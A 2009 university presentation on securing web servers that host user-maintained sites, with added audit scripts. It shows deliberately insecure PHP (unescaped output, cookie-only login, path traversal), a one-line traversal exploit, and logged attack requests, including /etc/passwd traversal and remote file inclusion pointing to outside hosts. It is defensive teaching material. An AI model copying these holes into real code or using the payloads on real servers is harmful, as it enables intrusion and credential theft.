Web Hygiene
Best practices for maintaining a secure web server when you have user maintained sites
March 12, 2009
Presented by: Debbie Gillespie
Email: deb@cs.umn.edu
Why am I here?
Overview
• What problems can be found on your web server
  – Bad permissions
  – Files that don’t belong
  – Unpatched applications
  – Bad scripts
• Ways to improve security on your server
  – Keep user maintained sites separate from departmental sites
  – Audit server frequently
  – 3rd party applications
Problems that I have found on our servers
World Writable Permissions / Apache Writable Permissions
• Directories
• Files
• .htaccess & .htpasswd files

Files that were never meant to be published on the web
• Grades
• Homework submissions
• Other files that are not “private,” but are not meant to be shared with everyone either
• Users often use their web space to collaborate with others

3rd Party Web applications
• I have never found a 3rd party web application that has been patched by the user who installed it

Bad Scripts
• Code that allows users to upload files or text
• Code that grants access to system commands
• Authentication that is just plain broken
Code that allows users to post text

```php
<?php
###### File that accepts registrations (input.php) #######
// raw POST fields are concatenated into one line of text, unvalidated and unescaped
$record = $_POST["name1"] . " and " . $_POST["name2"] . " registered for "
        . $_POST["time"] . " at slot " . $_POST["order"];
$reg_slot = $_POST["time"] . "_" . $_POST["order"];
$file_name = "record.dat";
$file_pointer = fopen($file_name, "a");
$reg_file = fopen("registered.dat", "a");
fwrite($reg_file, $reg_slot . "\n");
// add user supplied data to file that is web accessible
fwrite($file_pointer, $record . "\n");

######## File to Display contents of Registration (see_reg.php) ############
$reg_list = file("record.dat");
foreach ($reg_list as $reg_elem) {
    // whatever was posted is echoed back to every visitor as-is
    echo $reg_elem . "\n";
}
```
Bad Authentication Code - 1

```php
<?php
#### login.php ######
$login = trim($_POST["login"]);       // login stores the username
$password = trim($_POST["password"]);
if (strlen($login) == 0 or strlen($password) == 0)
    header('Location: index.html');   // redirect header only; the script keeps running
$filename = 'secret.txt';
$fp = fopen($filename, 'r');
$lines = explode("\n", @fread($fp, filesize($filename)));
$test = 0;
for ($i = 0; $i < count($lines); $i++) {
    // secret.txt holds plaintext "username|password" lines
    $line = explode("|", $lines[$i]);
    if (!strcmp($login, trim($line[0])) && !strcmp($password, trim($line[1])))
        $test = 1;
}
if ($test) {
    // the "session" is just the username in a cookie the client can set itself
    setcookie('key', $login, 2592000 + time());
    header('Location: ./list.php');
} else {
    header('Location: index.html');
}
```

Bad Authentication Code - 2

```php
<?php
##### Code to check whether user is logged in (check.php) ######
// only tests that the cookie exists; any value at all passes the check
if (!isset($_COOKIE['key'])) {
    header('Location: ./index.html');
}
```
Code that allows you to read files on server

```php
<?php
#### Script to read files stored in comments dir (readcomments.php) #####
// the id parameter goes straight into the path, so "../" walks out of comments/
$filename = "comments/" . $_GET["id"] . ".txt";
$fp = fopen($filename, 'r');
$file_contents = @fread($fp, filesize($filename));
$lines = explode("\n", $file_contents);
$numlines = count($lines);
for ($i = 0; $i < $numlines; $i++) {
    if (strlen($lines[$i]) == 0) continue;
    $comments = explode("|", $lines[$i]);
    echo "User: | " . $comments[0] . " |\n";
    echo "Comments: | " . $comments[1] . " |\n";
}
```

### Easy Exploit ###
readcomments.php?id=../secret
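The three scripts above share one shape: a request parameter is assigned to a variable and later reaches fopen(), echo or fwrite() unchecked. As an added triage tool (not part of the slides), this shell script runs a crude single-file taint check over user-maintained PHP so an administrator can find such scripts without reading every site by hand; the sink lists and the sample file in the test are assumptions.

```shell
#!/bin/sh
# scan_php_taint: crude, single-file taint check for user-maintained PHP.
# A variable becomes tainted when it is assigned from $_GET/$_POST/$_REQUEST/
# $_COOKIE or from another tainted variable; a line is reported when a tainted
# value appears in a file, exec or output call. It is flow-insensitive, knows
# nothing about sanitizers, and misses values bound by foreach, so treat hits
# as review candidates, not verdicts.
# Usage: scan_php_taint <file.php>   (prints file:line:kind)
scan_php_taint() {
    awk -v file="$1" '
    function tainted_in(s,    v) {
        if (s ~ /\$_(GET|POST|REQUEST|COOKIE)\[/) return 1
        for (v in taint) if (s ~ ("\\$" v "[^A-Za-z0-9_]")) return 1
        return 0
    }
    BEGIN { split("", taint) }
    {
        line = $0
        # "$name = ..." (a single "=", so == comparisons are skipped)
        if (match(line, /^[[:space:]]*\$[A-Za-z_][A-Za-z0-9_]*[[:space:]]*=[^=]/)) {
            lhs = substr(line, RSTART, RLENGTH)
            sub(/^[[:space:]]*\$/, "", lhs); sub(/[[:space:]]*=.*$/, "", lhs)
            rhs = substr(line, RSTART + RLENGTH - 1)
            if (tainted_in(rhs)) taint[lhs] = 1
        }
        if (line ~ /(fopen|file|file_get_contents|readfile|include|require|unlink)[[:space:]]*\(/ && tainted_in(line))
            print file ":" NR ":file-sink"
        if (line ~ /(system|exec|passthru|shell_exec|popen|eval)[[:space:]]*\(/ && tainted_in(line))
            print file ":" NR ":exec-sink"
        if (line ~ /(echo|print|fwrite|fputs|file_put_contents)[[:space:](]/ && tainted_in(line))
            print file ":" NR ":output-sink"
    }' "$1"
}

# scan every file given on the command line, e.g. scan_php_taint /var/www/users/*/*.php
for f in "$@"; do scan_php_taint "$f"; done
```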
What to do to improve web server “Hygiene”
Ways to minimize damage and prevent security breaches
Keep departmental sites separate from user developed sites
Put your user maintained sites on an apache process that does NOT host departmental sites
Make sure your apache users have minimal access
Use SuExec for CGI scripts
Audit Server Frequently
• Look for bad permissions
• Look for bad scripts
• Look for files that don’t belong on web server
• Remove sites that don’t belong
• Watch logs

Look for bad permissions
• find . -type d -perm -o=w -exec ls -lad {} \;
• find . -type f -perm -o=w -exec ls -lad {} \;

Look for bad scripts
• Directories and files that can be written to by apache are often symptomatic of a dangerous script
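The two find commands above only catch world-writable items; the slide on bad scripts points at a second class, anything the apache account itself can write. As an added example (not from the slides), this script combines both checks with a look for readable .htaccess/.htpasswd files; the account and group names default to "apache" and are assumptions for your server.

```shell
#!/bin/sh
# audit_webroot: one pass over a document root for the permission problems
# listed above: world-writable directories and files, anything the web server
# account itself can write (the usual sign of an upload or registration
# script), and credential files that every local user can read.
# Usage: audit_webroot <docroot> [apache-user] [apache-group]
audit_webroot() {
    root=$1
    web_user=${2:-apache}    # assumption: the account httpd runs as
    web_group=${3:-apache}   # assumption: its primary group

    echo "## world-writable directories under $root"
    find "$root" -type d -perm -o=w -exec ls -lad {} \;

    echo "## world-writable files under $root"
    find "$root" -type f -perm -o=w -exec ls -la {} \;

    echo "## writable by the web server account ($web_user / $web_group)"
    # owner-writable and owned by the web user, or group-writable in the web group;
    # the outer parentheses keep -exec from binding to the second branch only
    find "$root" \( \( -user "$web_user" -perm -u=w \) -o \( -group "$web_group" -perm -g=w \) \) \
        -exec ls -lad {} \;

    echo "## .htaccess / .htpasswd readable by everyone"
    find "$root" -type f \( -name .htaccess -o -name .htpasswd \) -perm -o=r \
        -exec ls -la {} \;
}

# run directly, e.g.: audit_webroot /var/www/users apache apache
if [ $# -gt 0 ]; then audit_webroot "$@"; fi
```

Feed the output into a ticket or a cron mail; a file that shows up in every run is a script to read, not a permission to silently fix.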
Look for files that don’t belong on a web server
Take out the trash • Remove sites that are no longer needed
Watch your logs
AWStats – Links from external pages
AWStats – Search Keyphrases
Example of suspect Apache log entries

194.0.252.2 - - [10/Jan/2009:20:14:18 -0600] "GET /help/web/phptut.php/display.php?page=&lang=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 13745 "-" "libwww-perl/5.810" 2454 80 9416 www.cs.umn.edu
66.132.137.128 - - [14/Jan/2009:09:53:58 -0600] "GET /help/web/phptut.php/?DOCUMENT_ROOT=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 13734 "-" "libwww-perl/5.65" 17851 80 14548 www.cs.umn.edu
63.247.65.114 - - [17/Jan/2009:10:59:04 -0600] "GET /help/web/phptut.php//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 200 13744 "-" "libwww-perl/5.810" 14215 80 9961 www.cs.umn.edu
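The three entries above carry the same tells: "../" traversal with a %00 to cut off an appended extension, a URL in a query parameter (remote file inclusion), GLOBALS/_REQUEST overrides, and the libwww-perl user agent. As an added example (not from the slides), this script pulls such requests out of an access log; the sample lines are constructed with documentation addresses and are not the real entries.

```shell
#!/bin/sh
# flag_suspect_requests: read Apache access-log lines on stdin and print
#   <client ip> <reasons> <request line>
# for requests showing the probes seen above: directory traversal, a %00 null
# byte, a URL passed in a query parameter (remote file inclusion), GLOBALS or
# _REQUEST overrides, and the libwww-perl user agent the scanners used.
flag_suspect_requests() {
    # split on double quotes: $2 is the request line, $6 the user agent
    awk -F'"' '
    {
        split($1, pre, " "); ip = pre[1]
        req = $2; ua = $6; reason = ""
        if (req ~ /\.\.\//)                  reason = reason "traversal "
        if (req ~ /%00/)                     reason = reason "nullbyte "
        if (req ~ /[?&][^ ]*=https?:\/\//)   reason = reason "rfi "
        if (req ~ /GLOBALS=|_REQUEST\[/)     reason = reason "globals-override "
        if (tolower(ua) ~ /libwww-perl/)     reason = reason "scanner-ua "
        if (reason != "") print ip, reason, req
    }'
}

# Constructed sample lines in the same combined-log shape as the slide
# (RFC 5737 documentation addresses and example.invalid, not the real clients).
SAMPLE_LOG='198.51.100.7 - - [10/Jan/2009:20:14:18 -0600] "GET /help/phptut.php/display.php?page=&lang=../../../../etc/passwd%00 HTTP/1.1" 200 13745 "-" "libwww-perl/5.810"
203.0.113.9 - - [14/Jan/2009:09:53:58 -0600] "GET /help/phptut.php/?DOCUMENT_ROOT=http://example.invalid/sik.txt? HTTP/1.1" 200 13734 "-" "libwww-perl/5.65"
192.0.2.44 - - [17/Jan/2009:10:59:04 -0600] "GET /index.php?GLOBALS=&mosConfig_absolute_path=http://example.invalid/chid.txt HTTP/1.1" 200 13744 "-" "Mozilla/5.0"
192.0.2.45 - - [17/Jan/2009:11:00:00 -0600] "GET /help/phptut.php HTTP/1.1" 200 13744 "-" "Mozilla/5.0"'

# on a real server: flag_suspect_requests < /var/log/httpd/access_log
printf '%s\n' "$SAMPLE_LOG" | flag_suspect_requests
```

A 200 status on these lines, as in the slide, is the part worth chasing: the script answered instead of refusing.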
Don’t allow users to install their own 3rd party applications

But, encourage users to use 3rd party applications
• UMWiki (https://wiki.umn.edu/)
• UThink (http://blog.lib.umn.edu/)
• WebVista (http://webct.umn.edu/)
• Moodle (https://moodle.umn.edu/)
• UMContent (http://1help.umn.edu/umcontent/)
• Netfiles (http://www1.umn.edu/netfiles/about.html)

Patch Installed Applications
• Sign up for mailing lists to receive notifications of new releases and security alerts

Additional Resources
• OWASP - The Open Web Application Security Project (http://www.owasp.org/)
• The OWASP Guide to Building Secure Web Applications (http://www.owasp.org/index.php/Category:OWASP_Guide_Project)
• 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (http://cwe.mitre.org/top25/)
Questions?